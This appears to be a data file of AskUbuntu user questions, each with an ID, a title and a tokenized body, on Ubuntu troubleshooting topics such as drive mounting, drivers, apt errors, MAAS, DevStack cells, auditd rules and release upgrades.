501857	harddrive not opening	i am new to linux , i have recently installed ubuntu 14.04 alongside windows 8.problem is when i boot into ubuntu , my hard drives are not opening ... it shows an error messege . *i have already done a disk check from windows everything is fine.the error shown is- error mounting /dev/sda2 at /media/rajnish/ec8a6a388a69ff86 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/rajnish/ec8a6a388a69ff86 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . and this is what i get on executing the command sudo fdisk -l yeah i know that..i always shutdown windows before logging into ubuntu . how to mount them in ubuntu ? and this is what i get after executing the command sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x3efa4f7b device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 204802047 102041600 7 hpfs/ntfs/exfat /dev/sda3 512002048 976771071 232384512 7 hpfs/ntfs/exfat /dev/sda4 204804094 512002047 153598977 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 204804096 302458879 48827392 83 linux /dev/sda6 302460928 496001023 96770048 83 linux /dev/sda7 496003072 512002047 7999488 82 linux swap / solaris partition table entries are not in disk order please help , thanks in advance
501868	ubunu got stuck after connecting windows phone	i have recently installed ubuntu 14.04 in my system . after installing i have connected my windows phone ( lumia 525 ) , after connecting the phone a music player icon appears on the left side panel . whenever i click on that icon ubuntu get friezed , so i have to unplug my phone to go to normal state . whereas i can able to browse the contents of my phone in my friends system who is using ubuntu 10.04 . i am also getting an error message ( attached image ) when un-pluging my phone . only once i got a error message related to mtp
501872	ca n't upgrade packages	i 'm truing to upgrade my packages because ubuntu software center does n't work . it just chashes when i 'm trying to execute it . in terminal i wrote : sudo apt-get update and here is an answer : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . so what should i do to solve this ? and why this error occurred ?
501873	how to switch between intel and amd graphics card ?	i 'm on ubuntu 14.04 using a zbook 14 which has intel速 haswell mobile graphics and an amd firepro m4100 . using the open-source radeon driver , how can i switch between the intel and the amd card ? i 'm using 14.04 so instructions for 13.10 and below do n't apply .
501875	monitor not booting up with pc - ubuntu 14.04	i 've recently made the conversion from windows 7 to ubuntu 14.04 and loving it ! ... until this morning when i 've tried to boot up my computer which seems to be booting fine , but my monitor is remaining black - not even showing bios etc . from memory it 's running an intel i7 3.4ghz / amd graphics / 8gb ram just unsure as to what i should do or what it could be.. and yes it 's plugged in at the back . any help is greatly appreciated . : )
501879	bash prompt chenged itself to a plain `` # ''	until i logged in today , as usual- my bash prompt was the standard `` username @ currpath # `` . but today , for me , it 's just `` # `` . if i login as root , it is normal . bashrc seems fine ( as compared to other machines '' . `` echo $ ps1 '' gives me , just `` # '' . what happened , and how do i fix this ? i also noted that `` ifconfig '' has gone missing . it works for root , yet my $ path looks normal . another thing ( added hours after posting ) : the up and down arrows used to scroll through the command history . now they give output like this `` ^ [ [ a^ [ [ b '' ( up-then-down ) , yet my locale and keyboard seem to be set properly . i am not sure if this is related to the prompt issue , but it changed at the same time .
501880	applications do n't appear in the dash ( 14.04 )	i 'm running 14.04 i 've had a read through this question , which has an answer which is roughly along the lines of other answers on the web , and does n't work for me . all applications disappear in the dash i can search all other files without an issue , but when i attempt to search for applications , i 'm not able to do so . i 'm not sure where to go with troubleshooting this - i 've ensured that unity-lens-applications is installed , along with unity-scope-master . is there anything else i can do to fix this ? i 'd honestly prefer not to have to launch all my applications from a terminal . on a newly-created user account , applications do appear . however , i 'd like to get this fixed on my login . suggested fixes run unity in alt + f2 this returns the same error as above , less the filters . sudo apt-get install zeitgeist zeitgeist-core it was already installed and up to date other suggestions which were ineffective : clear $ home/.cache/ and rebooting how do i reset my unity configuration ? how do i reset gnome to the defaults ? unity does n't load , no launcher , no dash appears as requested , the output of ls /usr/share/applications/ : activity-log-manager.desktop apport-gtk.desktop apturl.desktop bamf-2.index baobab.desktop bluetooth-sendto.desktop bluetooth-wizard.desktop brasero.desktop brasero-nautilus.desktop caffeine.desktop ccsm.desktop checkbox-gui.desktop cheese.desktop compiz.desktop credentials-preferences.desktop dconf-editor.desktop debian-uxterm.desktop debian-xterm.desktop defaults.list deja-dup.desktop deja-dup-preferences.desktop deluge.desktop display.im6.desktop docky.desktop dropbox.desktop emerald-theme-manager.desktop empathy.desktop eog.desktop evince.desktop evince-previewer.desktop evolution-data-server-uoa.desktop extras-calendar-indicator.desktop extras-pushbullet-indicator.desktop extras-variety.desktop facebookmessengerfacebookcom.desktop file-roller.desktop firefox.desktop gcalctool.desktop gconf-editor.desktop gcr-prompter.desktop gcr-viewer.desktop geary.desktop gedit.desktop gimp.desktop gkbd-keyboard-display.desktop gmailmailgooglecom.desktop gnome-activity-log-manager-panel.desktop gnome-background-panel.desktop gnome-bluetooth-panel.desktop gnome-color-panel.desktop gnome-contacts.desktop gnome-control-center.desktop gnome-datetime-panel.desktop gnome-deja-dup-panel.desktop gnome-disk-image-mounter.desktop gnome-disk-image-writer.desktop gnome-disks.desktop gnome-display-panel.desktop gnome-font-viewer.desktop gnome-info-panel.desktop gnome-keyboard-panel.desktop gnome-mouse-panel.desktop gnome-network-panel.desktop gnome-online-accounts-panel.desktop gnome-power-panel.desktop gnome-power-statistics.desktop gnome-printers-panel.desktop gnome-region-panel.desktop gnome-screen-panel.desktop gnome-screenshot.desktop gnome-sound-panel.desktop gnome-sudoku.desktop gnome-system-log.desktop gnome-system-monitor.desktop gnome-system-monitor-kde.desktop gnome-terminal.desktop gnome-universal-access-panel.desktop gnome-user-accounts-panel.desktop gnome-user-share-properties.desktop gnome-wacom-panel.desktop gnomine.desktop googlecalendargooglecom.desktop google-chrome.desktop googleplusplusgooglecom.desktop gucharmap.desktop hplj1020.desktop ibus-setup-bopomofo.desktop ibus-setup.desktop ibus-setup-pinyin.desktop im-config.desktop landscape-client-settings.desktop language-selector.desktop libreoffice-calc.desktop libreoffice-draw.desktop libreoffice-impress.desktop libreoffice-math.desktop libreoffice-startcenter.desktop libreoffice-writer.desktop libreoffice-xsltfilter.desktop mahjongg.desktop mimeinfo.cache mono-runtime-common.desktop mono-runtime-terminal.desktop mount-archive.desktop nautilus-autorun-software.desktop nautilus-classic.desktop nautilus-connect-server.desktop nautilus.desktop nautilus-folder-handler.desktop nautilus-home.desktop nm-applet.desktop nm-connection-editor.desktop nvidia-settings.desktop onboard.desktop onboard-settings.desktop orca.desktop popcorn-time.desktop python2.7.desktop python3.4.desktop redditredditcom.desktop remmina.desktop rhythmbox.desktop rhythmbox-device.desktop root-system-bin.desktop screenlets-manager.desktop seahorse.desktop session-properties.desktop shotwell.desktop shotwell-viewer.desktop shutter.desktop signon-ui-browser-process.desktop simple-scan.desktop software-properties-drivers.desktop software-properties-gnome.desktop software-properties-gtk.desktop sol.desktop spotify.desktop sublime_text.desktop system-config-printer.desktop tekka.desktop thunderbird.desktop totem.desktop transmission-gtk.desktop twittertwittercom.desktop typecatcher.desktop ubuntu-amazon-default.desktop ubuntu-software-center.desktop unity-activity-log-manager-panel.desktop unity-appearance-panel.desktop unity-bluetooth-panel.desktop unity-color-panel.desktop unity-control-center.desktop unity-credentials-panel.desktop unity-datetime-panel.desktop unity-deja-dup-panel.desktop unity-display-panel.desktop unity-info-panel.desktop unity-keyboard-panel.desktop unity-lens-photos.desktop unity-mouse-panel.desktop unity-network-panel.desktop unity-power-panel.desktop unity-region-panel.desktop unity-scope-gdrive.desktop unity-screen-panel.desktop unity-sound-panel.desktop unity-tweak-tool.desktop unity-universal-access-panel.desktop unity-user-accounts-panel.desktop unity-wacom-panel.desktop unitywebappsqmllauncher.desktop update-accounts.desktop update-manager.desktop usb-creator-gtk.desktop vino-preferences.desktop vlc.desktop webbrowser-app.desktop xdiagnose.desktop yelp.desktop
501888	after update , dell e5440 enable wireless option is missing	after system update wireless connection is completely ruined . the 'enable wireless ' option is no more visible . this is what lshw is yielding.i followed the troubleshooting guide here : https : //help.ubuntu.com/community/wifidocs/wirelesstroubleshootingguide , but in vain . sudo lshw -c network *-network description : ethernet interface product : ethernet connection i218-lm vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : ec : f4 : bb:13:4e:94 size : 10mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k duplex=full firmware=0.6-3 ip=10.100.10.57 latency=0 link=yes multicast=yes port=twisted pair speed=10mbit/s resources : irq:60 memory : f7c00000-f7c1ffff memory : f7c3c000-f7c3cfff ioport : f080 ( size=32 ) the hardware switch is on and getting detected . rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no rgds , anirban
501889	ubuntu crash after update to 13.10	after update from ubunt 12.10 to 13.10 i log in with admin account but it get crash , ubuntu only showw a black screen , but when i log in with a guest sesion it works . any one know how to solve this one ? regards
501890	installation of sun/oracle jdk in ubuntu	how to install oracle jdk 1.6 version in ubuntu 12.04 through terminal kindly help me with the installation stpes ?
501892	ubuntu 12.04 : c++ program - > broken pipe - > can not get past tty1	while i was running a c++ program ( it involved sdl ) , the computer completely froze up ; control c did n't work , and escape did n't work ( i had it programmed that escape would close the program ) . so , after a lot of mashing , i reset the computer . that was when i encountered a `` could not write bytes : broken pipe '' error . since i could n't really move on from there , i restarted again , and this time i was prompted to a tty1 console . i had an nvidia card , and i encountered this tty1 console loop before , so i purged my nvidia drivers and reinstalled . however , this did n't work either , and then after restarting again , my tty1 console constantly pops up . not only that , but the console will transition to a black screen with a blinking cursor after like 30 or so seconds . all of this because of the c++ program . if it helps , i also noticed that i no longer have an nvidia module or nv module ( in xorg ) . things that happened before i ran that program : i downloaded clang , llvm , and libsdlv1.2 . i also did an update manager thing . can anyone help me with this ? thanks
501893	is there any software to maintain a track of all files in a folder . like a database ?	i am aware of a few that use tags and metadata but the actual database where the records are tracked is not accessible . i am interested in a simple spreadsheet that gives me a list of all files added in a folder with certain metadata .
501896	pressing 'l ' key locks the screen in ubuntu while rdp from windows	this annoying issue is only happening when i 'm taking remote view of ubuntu12.04 from windows using rdp . pressing the 'l ' key while typing always locks the screen . also the big 'enter ' key is not working only the 'enter ' key near numpad is working .
501899	bluefish not running as root	i was working on a file with the name login.html in bluefish opened as root , and i decided to rename it . so i closed bluefish ( but without closing the file in bluefish ) and renamed the file . when i tried to open bluefish again it gave me this error . error reading list 1 error opening file : no such file or directory ** ( bluefish:24717 ) : warning ** : no configfile rcfile-2.0 , try to convert config files from older versions config file migration error 1 : error opening file : no such file or directoryerror reading list 1 error opening file : no such file or directory ( bluefish:24717 ) : glib-error ** : /build/buildd/glib2.0-2.40.0/./glib/gmem.c:103 : failed to allocate 18446744073666193602 bytes trace/breakpoint trap ( core dumped ) i can still open bluefish normally ( without root ) . update even reinstalling bluefish did not fix the problem .
501904	installing ubuntu on imac g5 without os	i have recently got an imac g5 from an auction but it does not have any os . i tried to boot it using a usb drive with necessary commands on its terminal but it wo n't boot . finally , i tried to boot it using cd for ubuntu installation , but still it does not seem to respond . could you tell me how or what i should do in this situation ? while buying , it 's told that the system is working good in all os . could you help me figure out this problem . thanks .
501906	need to deploy windows 8 and ubuntu to multiple machines	is there a tool that will carry out the deployment of windows 8 and ubuntu on about 20 machines , maybe a lot more , including the disk operations as well ? i need to be able to specify the percentages or absolute sizes of the partitions to be created , and install a bootloader ( grub ? ) .
501907	keyboard locks in intellij idea on ubuntu 14.04	could n't you help me with hell of a wierd issue ? i use intellij idea 13 on ubuntu 14.04 and from time to time my keyboard completely ( yep , completely , it 's not about shortcuts ) locks in idea . i still can do anything i want in idea with my mouse , also i can use the keyboard everywhere else except idea . and it can be fixed only by restarting idea so far . can anybody give a hint , please ?
501910	how to text-to-speech output using command-line ?	how to get speech output from entered text by using command-line ? also facility to change speech rate , pitch , volume etc using simple command .
501913	bash script programming : how to match pattern in string ?	how i can get this whole value 7i45432zx from below lines : pw*3434*453*256*pe*ub po*00*ne*7i4543 2zx**20140617 pw*3434*453*256*pe*ub po*00*ne*7i4543 2zx**20140617 this is the code i tried : grep -op 'po.00 . [ a-z ] [ a-z ] .\k [ a-z0-9_- ] * ' < file.txt i have this code above however , the generated output is only this 7i4543 and not the whole 7i45432zx , which is suppose to be my expected output . is there something i had to modify or add after .\k to get the whole value ?
501914	logging in just brings me to the default ubuntu background	i was messing around with external drives , and since i rebooted , logging in just takes me to the default wallpaper with no unity toolbar or anything .
501915	unwanted periodical restarts	a couple of weeks ago , i thought i solved the cron job problem which is responsible for unwanted periodical restarts in 60 mins . i used acpi=off line for this . but now the problem occurs again with a difference . it restarts in every ~60,5 mins instead of 60 and can not see the restart comments in /var/log/syslog file like the previous problem . how can i solve this issue ? thanks . last lines before ( and one after ) the restart : jul 27 01:48:37 cmsmetu-desktop rtkit-daemon [ 1443 ] : supervising 3 threads of 1 processes of 1 users . jul 27 01:48:37 cmsmetu-desktop kernel : [ 22.810656 ] hda-intel : irq timing workaround is activated for card # 0 . suggest a bigger bdl_pos_adj . jul 27 01:48:37 cmsmetu-desktop rtkit-daemon [ 1443 ] : successfully made thread 1618 of process 1618 ( n/a ) owned by '104 ' high priority at nice level -11 . jul 27 01:48:37 cmsmetu-desktop rtkit-daemon [ 1443 ] : supervising 4 threads of 2 processes of 1 users . jul 27 01:48:37 cmsmetu-desktop pulseaudio [ 1618 ] : [ pulseaudio ] pid.c : daemon already running . jul 27 01:49:33 cmsmetu-desktop ntpdate [ 1349 ] : step time server 91.189.94.4 offset 52.797886 sec jul 27 01:49:42 cmsmetu-desktop networkmanager [ 798 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . jul 27 01:49:42 cmsmetu-desktop networkmanager [ 798 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... jul 27 01:49:42 cmsmetu-desktop networkmanager [ 798 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... jul 27 01:49:42 cmsmetu-desktop networkmanager [ 798 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . # restart here ( text for clarification only , did not actually appear in the file ) jul 27 02:17:01 cmsmetu-desktop cron [ 1637 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly )
501920	how do i find logs that report the cause of a system crash ?	my computer with trusty is often rebooting , apparently in a random way . i have looked in system register but there are so many logs that is quite difficult to find the ones which only report the error that made the system reboot . how can i find only those which caused the reboot ?
501924	mac external drive ejects itself	i have been given an external drive that was formatted for mac to copy some files onto . when i have freshly booted , it auto mounts and i can see the files , but when i try to copy files on or off the drive it unmounts itself . i think it may have some kind of built in security ? i 'm fairly new to ubuntu ( just installed 12.04 as dual boot alongside win 7 , although i have used this version before on other machines ) i 'm thinking i may need to use root access to change the permissions ? i did try changing permission in nautilus when running from live usb , but it unmounted while i was looking through the properties . i 'm a little cautious to do stuff as root , although i 'm sure i can manage it with a little help . i have goggled a lot and seen mac drives sometimes have user account permission issues . i changed the permissions butit keeps unmounting though . i could n't find any examples of anyone having this problem before . the drive is a 250gb seagate freeagent go . i 'm not sure if it was one specifically made for mac , or was formatted that way after purchase . pn:9kw2m4-500 sn:2ge1tmfo if i could copy the files off , and format it to fat32 for maximum compatibility the owner would be very happy . i also tried fdisk -l and running nautilus with sudo , neither could see the drive after it unmounted . when i plug it in freshly booted , it beeps a few times ( never had an external drive beep at me before ! ) then the light goes on and beeping stops , at which point it auto mounts ok. until i try to use it , hen it just unmounts again and i get an error message saying the location no longer exists . at which point it starts beeping continuously until unplugged . once the drive has unmounted itself it will not be detected again if i unplug it and plug it back in . it just beeps a lot . no lights . [ edit ] i have now been able to get the device to auto mount after a wait without re-booting . still cant seem to change permissions though . found a site that says the seagate freeagent go does have built in security . although i 'm having trouble finding details . thinking about removing the drive from its case and using my hd dock
501928	mouse cursor sometimes is some pixel over its real position	i 'm on 14.04 / unity . i ca n't say how to replicate or which are contingent conditions , but sometimes my mouse coursor is some pixel upper than its real position , so if i click on an object , probably i 'm clicking on something that is some pixel down . this issue go away by itself , i ca n't say how , after a few clicks . it seems it happens with specific applications , such as firefox and thunderbird ... i need suggestions about how to investigate .
501929	3 monitors mixing gpu and igu	i 'm completely new to ubuntu and am trying to get 3 monitors ( or four if possible ) to work on a geforce gtx550ti and integrated graphics . when i installed , ubuntu seemed to extend the top bar across all three screens , but when i actually started it , it would use the two gtx550ti monitors normally and just leave the igu monitor on the boot screen . is there any way to get the third monitor to behave ? my setup : asus z87k intel i7-4770k gtx550 i have a geforce 7200 if that would help ? if this is my only option , can someone tell me how to make windows 7 ( ewww ) work with it ? http : //i.stack.imgur.com/b2ud4.jpg
501930	chromium browser 34 version repository download	can someone please help me with downloading chromium browser 34 version , any repository or ppa . i want chromium-browser 34 version only . thanks in advance
501931	amqp connection closed when nova cells are enabled on devstack	i have set up devstack on 3 servers having ips 10.10.1.51,10.10.1.53 and 10.10.1.54 . i configured the devstack on server 53 ( ip 10.10.1.53 ) as the parent/api cell and configured the openstack on 51 and 54 as child cells . i enabled cells by specifying enable_service n-cell in the respective localrc files . the nova.conf in the parent is as follows : [ default ] # swap out the compute_api class so actions are proxied to nova-cells service . compute_api_class=nova.compute.cells_api.computecellsapi [ cells ] name=api enable=true cell_type=api nova.conf in the child cell1 is as follows : [ global ] # disable quota checking in child cells . let api cell do it exclusively . quota_driver=nova.quota.noopquotadriver [ cells ] enable=true name=cell1 # something unique per child cell cell_type=compute nova.conf in child cell2 is as follows : [ global ] # disable quota checking in child cells . let api cell do it exclusively . quota_driver=nova.quota.noopquotadriver [ cells ] enable=true name=cell1 # something unique per child cell cell_type=compute we have the following rabbit server info on the parent cell : rabbit_host=10.10.1.53 rabbit_port=5672 rabbit_username=admin rabbit_password=password rabbit_virtual_host=api_vhost and in the child cell named 'cell1 ' we have the following rabbit server info : rabbit_host=10.10.1.54 rabbit_port=5673 rabbit_username=admin rabbit_password=password rabbit_virtual_host=cell1_vhost and in the child cell named 'cell2 ' we have the following rabbit server info : rabbit_host=10.10.1.51 rabbit_port=5673 rabbit_username=admin rabbit_password=password rabbit_virtual_host=cell2_vhost after which i ran the following commands in the api cell to tell about its children : > nova-manage cell create -- name=cell1 -- cell_type=child -- username=admin -- password=password -- hostname=10.10.1.51 -- port=5673 -- virtual_host=cell1_vhost -- woffset=1.0 -- wscale=1.0 > nova-manage cell create -- name=cell2 -- cell_type=child -- username=admin -- password=password -- hostname=10.10.1.54 -- port=5673 -- virtual_host=cell1_vhost -- woffset=1.0 -- wscale=1.0 the following command was run in both the child cells to tell them about their parent : > nova-manage cell create -- name=api -- cell_type=parent -- username=admin -- password=password -- hostname=10.10.1.53 -- port=5672 -- virtual_host=api_vhost -- woffset=1.0 -- wscale=1.0 n-cell-child and n-cell-region were restarted in all the 3 stack sessions . n-cell-region of all 3 stack sessions gave an error saying : 2014-07-24 12:54:01.633 error oslo.messaging._drivers.impl_rabbit [ req-5154ff13-4f6f-4582-8a44-d42941e9a4bc none none ] amqp server 10.10.1.53:5672 closed the connection . check login credentials : socket closed n-cell-child screens in both the child cells gave the following error : 2014-07-24 12:57:11.579 error oslo.messaging._drivers.impl_rabbit [ req-ba63e502-f099-4e55-a8e9-297390f5598f none none ] amqp server on 10.10.1.54:5672 is unreachable : [ errno 111 ] econnrefused . trying again in 30 seconds . however there is no error in n-cell-child screen of the parent cell . amqp broker running is rabbitmq-server on all 3 servers . i have checked the users listing in rabbitmq and the credentials seem to be fine . any help in debugging the error would be appreciated . thanks in advance !
501933	upgrade maas from 1.5 to 1.6 on a running installation	is it possible to upgrade an exsisting maas installation from 1.5 to 1.6 on 14.04 ? is there a ppa for this ? i 'm currently running 1.5 on trusty . i 've 16 nodes in the rack so far registered in maas , commissioned and ready . i 've rolled out juju-core and have a juju bootstrap node . the main issue for the upgrade is , that the juju bootstrap node receives a new ip on every reboot . renedering it practically useless . maas 1.4 on 12.04 does not have this problem , once the nodes are allocated , the ip sticks to the system . as one can read here in a newer version , there are more config options for static vs dynamic ip 's in the cluster management .
501937	how to increase buffered data limit ?	within ubuntu i 've created a mongodb db collection containing 1 million records , and when trying to run a sort command against it , i 'm getting the following error : `` $ err '' : `` runner error : overflow sort stage buffered data usage of 33555002 bytes exceeds internal limit of 33554432 bytes '' , `` code '' : 17144 please can anyone describe how to increase the internal limit so that i can execute this and some other large scale commands against the data ?
501939	full disk encryption and dropbox	i am considering to do a full disk encryption on a fresh install . the files that i store on the dropbox folder , will be sent to dropbox encrypted ? what if i plug an external unencrypted hard disk and i add a file to it , it would be encrypted ?
501943	can not ping local site	i have the following situation : on one server in our network we have the dns server . here we define hostnames for some local sites ( ex : 192.160.1.6:8060 - > fisheye.idn.local ) . when accesing the site fisheye.idn.local in a browser , the behaviour is correct . on a second server we have the actual tools installed ( on 192.168.1.6 ) . unfortunately , while on this system i can not ping fisheye.idn.local - > getting an unknown host message . if i do an nslookup , i get the correct address ( 192.168.1.6 ) . any idea why i can not ping the address ? i need it to work so that i can create links between the different applications running on this server .
501944	ubuntu on different phones	i 'm planning to buy a phone that support the ubuntu platform.please help me to select one from the list . 1.asus zenfone 4 a450cg 2.lenovo a526 3.lenovo a390 4.lenovo a680 which of these provides hassle-free ubuntu experience ? please help me
501945	maas can not power control virsh node	maas is not able to power-control vm-nodes . if i try to commission a declared vm node with the power settings : power address : qemu+ssh : //ubuntu @ 192.168.25.14/system power id : vm1 the node does not start , but performing virsh -c qemu+ssh : //ubuntu @ 192.168.25.14/system start vm1 in the terminal works fine . i checked in the host node , all ssh keys are there the key of my user , the juju-client-key and the juju-system-key .
501949	maas distributes new ip on every reboot	i have a working installation of maas in version 1.5 on trusty . i 've deployed a juju bootstrap node already through it and have some 15 other physical machines in ready state . i 've successfully deployed juju-gui on the bootstrap node and all is well . i just figured , though , that i have a problem with the ips . i had to reboot the bootstrap node , after that it was unavailable . that 's because maas provided the system with a new ip from the dhcp pool . it does this , on every reboot , thought the system is allocated to a user . did i miss any config entries ? i did n't have this behavior on maas 1.4 on precise . so i 'm a little surprised by this . at this moment , i can not make progress with the roll out of the cluster through juju , as juju-core is unable to contact the bootstrap node .
501950	the find function does not work in ubuntu14.04	i installed ubuntu 14.04 on my pc a couple of days ago . frankly speaking , it is a very great os with high performance . but what brings me trouble is the ctrl + f function does not work in every application ( such as chrome , gedit ) . i am not sure whether this problem is caused by some bug of this os or by myself resulted from unsuitable settings .
501951	how to enable global menubar for gtk apps on kubuntu 14.04	i am used to having the global menubar ( i.e . app menus are not shown in the app window but in the top panel ) . in kubuntu 12.04 this worked very well , however upon installing kubuntu 14.04 the menubar only works for kde applications and a few other apps like firefox and chromium . is there a way to enable the global menubar also for gtk apps ? since ubuntu uses the global menubar by default it should be possible right ?
501952	keyboard layout switching does n't work properly in gnome 3 .	i 'm using ubuntu 14.04 with gnome 3 installed from the regular repositories . i have two issues with the keyboard layout behavior ( english and hebrew ) : when i switch the keyboard , the indicator on the screen actually show the opposite ( pointing on he when switch to en and vise averse ) the keyboard layout is n't separated between windows , even though this is i set it to behave . am i the only one who sees this ? is this a known bug ? i also have kde installed on the machine , but i do n't use it .
501955	does bios device whitelist affect ubuntu ?	starting with 2002 , lenovo ( actually , it was ibm back then ) started whitelisting the wireless adapters and other devices allowed to be used in their thinkpad laptops . some other manufacturers are probably doing this , too . the exact list of allowed hardware was never publicly documented . some enthusiasts have modified bios to remove these restrictions . are such modifications necessary if i 'm only going to run ubuntu on my laptop ? ( not windows ) . is the answer any different if i 'm only going to run windows in a virtual machine of some sort ?
501957	downgrading libxml2 on 12.04	for some reason , on one of the servers that we have in our network running ubuntu server 12.04 , the version of libxml2 is 2.8.0 ( which is the one from ubuntu 12.10 ) . this creates some issues , especially since i need to install libxml2-dev and i get some unmet dependencies . i get the following error : libxml2-dev : depends : libxml2 ( = 2.7.8.dfsg-5.1ubuntu4.9 ) but 2.8.0+dfsg1-5ubuntu2.2 is to be installed i do not know why the newer version of libxml2 is present on the system , but is there a way to either use the new version of libxml2-dev ( which is not present in the default sources.list ) or to safely downgrade libxml2 to the correct version for 12.04 ?
501959	going from 32-bit to 64-bit , will `` reinstall ubuntu '' in the installer break my system ?	i 'm trying to go from a 32-bit xubuntu 14.04 to a 64-bit xubuntu 14.04 . in the installer , i get this option : reinstall ubuntu 14.04 lts . my /home is already on a separate partition , so my documents are all safe . what i 'm wondering about here is the `` installed software will be kept '' bit . does this mean it just does n't touch my already installed software ? but the installed programs are all 32-bit packages ! would n't my freshly installed 64-bit system break right away ? well , what i really want to know is : does the installer properly handle this ? for all i know it just gets a record of the installed software and then installs the appropriate 64-bit packages over them , but as it is , i just ca n't be certain what it will do .
501962	how to kill a specific x11rdp session	i am using x11rdp with xrdp v0.6.0 in ubuntu 12.04 the problem that when i connect remotely from home to office my session is stuck ! when i get back to work i ca n't open applications that are already run in the x11rdp session . e.g . firefox , empathy ... i have to close them then i can open the needed app again . i know i can pkill -u user but it seems non-professional i tried sudo service xrdp restart ( or stop then start ) . it does n't close current sessions . is there is any xrdp session manager like in windows server or can i kill only my user 's session ?
501964	cant install unity-control-center after update to 14.04	i was running 12.04 then upgraded to 14.04 and tried to reinstall unity-control-center but i get : unity-control-center : depends : libpulse-mainloop-glib0 ( > = 1:0.99.1 ) but 1:4.0-0ubuntu11 is to be installed bash : syntax error near unexpected token ( 'me @ server : ~ $ depends : libpulse0 ( > = 1:0.99.1 ) but 1:4.0-0ubuntu11 is to be installed bash : syntax error near unexpected token ( 'me @ server : ~ $ depends : libxi6 ( > = 2:1.2.99.4 ) but 2:1.7.1.901-1ubuntu1 is to be installed how can i resolve this ? i am installing this because i can not open it via menu- > system settings
501965	why is n't auditd logging file deletes ?	i have auditd installed on 64-bit ubuntu 12.04 to track down some unexpected deletes ( nice discussion of auditd ) . this is my rule ( tagging deletes with the deletes keyword ) : -a exit , always -f arch=b64 -s unlink -s rmdir -k deletes auditctl -l shows that it 's configured : list_rules : exit , always arch=3221225534 ( 0xc000003e ) key=deletes syscall=rmdir , unlink this works perfectly : # mkdir xyx # rmdir xyz # ausearch -k deletes|grep 'xyz' type=path msg=audit ( 1406147794.737:1880 ) : item=1 name= '' xyz '' inode=12386307 dev=08:04 mode=040755 ouid=0 ogid=0 rdev=00:00 but this does not : # touch xyx # rm xyx # ausearch -k deletes|grep 'xyz' i can see that all sorts of other deletes are logged . what am i missing ?
501969	getting back to windows xp	i installed ubuntu 14.04 on an asus eee pc 1001px netbook over windows xp , but now i really need to get back to a native bootable windows xp . i have the windows installation cd but the machine wo n't let me boot from anything other than the hard drive ( despite fiddling with bios boot order , it will not boot from an sd card or external dvd player ) . i can still see the factory windows xp recovery partition on the hard drive , but the machine boots direct into ubuntu without offering any other options . my two questions are : could installing ubuntu have done something to the bios boot options ? if so , how do i undo that so i can boot from an external device ? given i can only boot from the hard drive , how can i get it to offer me the option to boot into windows xp recovery ?
501972	how do i switch between xfce and unity ?	how do i switch between xfce and unity , after i installed unity form the software center ? i 've looked online and experimented and failed to find a the answer for this . how do i switch from xfce to unity ( on ubuntu studio ) ? i saw some suggestions to switch by logging out and selecting one of the sessions installed . but all i have are xfce session and ubuntustudio . found the solution : sudo apt-get update sudo apt-get install ubuntu-desktop
501976	unable to upgrade from 13.04 to 14.04	i 'm running ubuntu 13.04 , and would like to upgrade to 14.04 . entering the following commands gives me output indicating that it can not be done . $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring $ sudo do-release-upgrade checking for a new ubuntu release no new release found how can this be done ? ( i have the iso file for 14.04 too , if that makes a difference ) update : as per the sugestion below , i tried this , to no avail ? $ sudo do-release-upgrade -d checking for a new ubuntu release no new release found update : further investigation revealed that updates were not working too . $ sudo apt-get update # truncated e : some index files failed to download . they have been ignored , or old ones used instead . are there any software sources that still host raring ( 13.04 ) ? update : editing the software sources to point to old-releases.ubuntu.com worked , enabling sudo apt-get update & & sudo apt-get dist-upgrade to run as expected . however , sudo do-release-upgrade -d still yields the same result : checking for a new ubuntu release no new release found
